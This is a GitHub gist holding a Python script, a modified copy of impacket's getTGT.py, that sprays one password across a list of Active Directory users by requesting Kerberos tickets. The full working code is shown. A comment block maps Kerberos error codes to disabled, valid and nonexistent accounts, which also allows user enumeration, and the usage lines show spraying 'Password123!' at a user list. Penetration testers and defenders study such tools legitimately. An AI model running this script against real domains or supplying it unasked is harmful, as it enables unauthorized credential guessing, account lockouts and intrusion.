Created
June 6, 2018 16:56
-
-
Save carnal0wnage/64fed393c574a399dfa8c22c387bc731 to your computer and use it in GitHub Desktop.
modified impacket getTGT.py to take a list of domain users and attempt password spraying using kerberos
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# Copyright (c) 2016-2018 CORE Security Technologies | |
# | |
# This software is provided under under a slightly modified version | |
# of the Apache Software License. See the accompanying LICENSE file | |
# for more information. | |
# | |
# Author: | |
# Alberto Solino (@agsolino) | |
# | |
# Description: | |
# Given a password, hash or aesKey, it will request a TGT and save it as ccache | |
# | |
# Examples: | |
# ./getTGT.py -hashes lm:nt contoso.com/user | |
# | |
# | |
import argparse | |
import logging | |
import sys | |
from binascii import hexlify, unhexlify | |
from impacket import version | |
from impacket.examples import logger | |
from impacket.krb5.kerberosv5 import getKerberosTGT | |
from impacket.krb5 import constants | |
from impacket.krb5.types import Principal | |
class GETTGT: | |
def __init__(self, target, password, domain, options): | |
self.__password = password | |
self.__user= target | |
self.__domain = domain | |
self.__lmhash = '' | |
self.__nthash = '' | |
self.__aesKey = options.aesKey | |
self.__options = options | |
self.__kdcHost = options.dc_ip | |
if options.hashes is not None: | |
self.__lmhash, self.__nthash = options.hashes.split(':') | |
def saveTicket(self, ticket, sessionKey): | |
logging.info('Saving ticket in %s' % (self.__user + '.ccache')) | |
from impacket.krb5.ccache import CCache | |
ccache = CCache() | |
ccache.fromTGT(ticket, sessionKey, sessionKey) | |
ccache.saveFile(self.__user + '.ccache') | |
def run(self): | |
try: | |
userName = Principal(self.__user, type=constants.PrincipalNameType.NT_PRINCIPAL.value) | |
tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, self.__password, self.__domain, | |
unhexlify(self.__lmhash), unhexlify(self.__nthash), self.__aesKey, | |
self.__kdcHost) | |
self.saveTicket(tgt,oldSessionKey) | |
except Exception as e: | |
print('{}: {}'.format(userName,e)) | |
''' | |
disableduser : KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) <-- disabled account | |
validuser : Kerberos SessionError: KDC_ERR_PREAUTH_FAILED(Pre-authentication information was invalid) <-- wrong password | |
nonexistuser : Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) <-- group name or nonexistent user | |
''' | |
if __name__ == '__main__': | |
# Init the example's logger theme | |
logger.init() | |
print version.BANNER | |
parser = argparse.ArgumentParser(add_help=True, description="Given a password, hash or aesKey, it will request a " | |
"TGT and save it as ccache") | |
# parser.add_argument('identity', action='store', help='[domain/]username[:password]') | |
parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON') | |
group = parser.add_argument_group('authentication') | |
group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH') | |
group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)') | |
group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file ' | |
'(KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ' | |
'ones specified in the command line') | |
group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication ' | |
'(128 or 256 bits)') | |
group.add_argument('-dc-ip', action='store',metavar = "ip address", help='IP Address of the domain controller. If ' | |
'ommited it use the domain part (FQDN) specified in the target parameter') | |
group.add_argument('-username', action='store',metavar = "username", help='username to use every time REALM/USERNAME') | |
group.add_argument('-userlist', action='store',metavar = "user_list", help='user list to use for password spray') | |
group.add_argument('-password', action='store',metavar = "password", help='password to pass along') | |
group.add_argument('-passwordlist', action='store',metavar = "password_list", help='password list to use for password spray') | |
group.add_argument('-domain', action='store',metavar = "domain", help='REALM value to use') | |
if len(sys.argv)==1: | |
parser.print_help() | |
print "\nExamples: " | |
print "\t./getTGT_brute.py -hashes lm:nt contoso.com/user\n" | |
print "\t./getTGT_brute.py -domain CORP.DOMAIN.COM -username admin -password 'Password123!' -dc-ip 192.168.1.2\n" | |
print "\t./getTGT_brute.py -domain CORP.DOMAIN.COM -userlist username_list.txt -password 'Password123!' -dc-ip 192.168.1.2\n" | |
print "\tit will use the lm:nt hashes for authentication. If you don't specify them, a password will be asked" | |
sys.exit(1) | |
options = parser.parse_args() | |
if options.debug is True: | |
logging.getLogger().setLevel(logging.DEBUG) | |
else: | |
logging.getLogger().setLevel(logging.INFO) | |
import re | |
#domain, username, password = re.compile('(?:(?:([^/:]*)/)?([^:]*)(?::([^@]*))?)?').match(options.identity).groups( | |
# '') | |
domain = options.domain | |
username = options.username | |
password = options.password | |
userlist = options.userlist | |
passwordlist = options.passwordlist | |
try: | |
if domain is None: | |
logging.critical('Domain should be specified!') | |
sys.exit(1) | |
if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None: | |
from getpass import getpass | |
password = getpass("Password:") | |
if options.aesKey is not None: | |
options.k = True | |
if userlist is not None: | |
lines = [line.rstrip('\n') for line in open(userlist)] | |
for x in lines: | |
executer = GETTGT(x, password, domain, options) | |
executer.run() | |
#executer = GETTGT(username, password, domain, options) | |
#executer.run() | |
except Exception, e: | |
if logging.getLogger().level == logging.DEBUG: | |
import traceback | |
traceback.print_exc() | |
print str(e) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment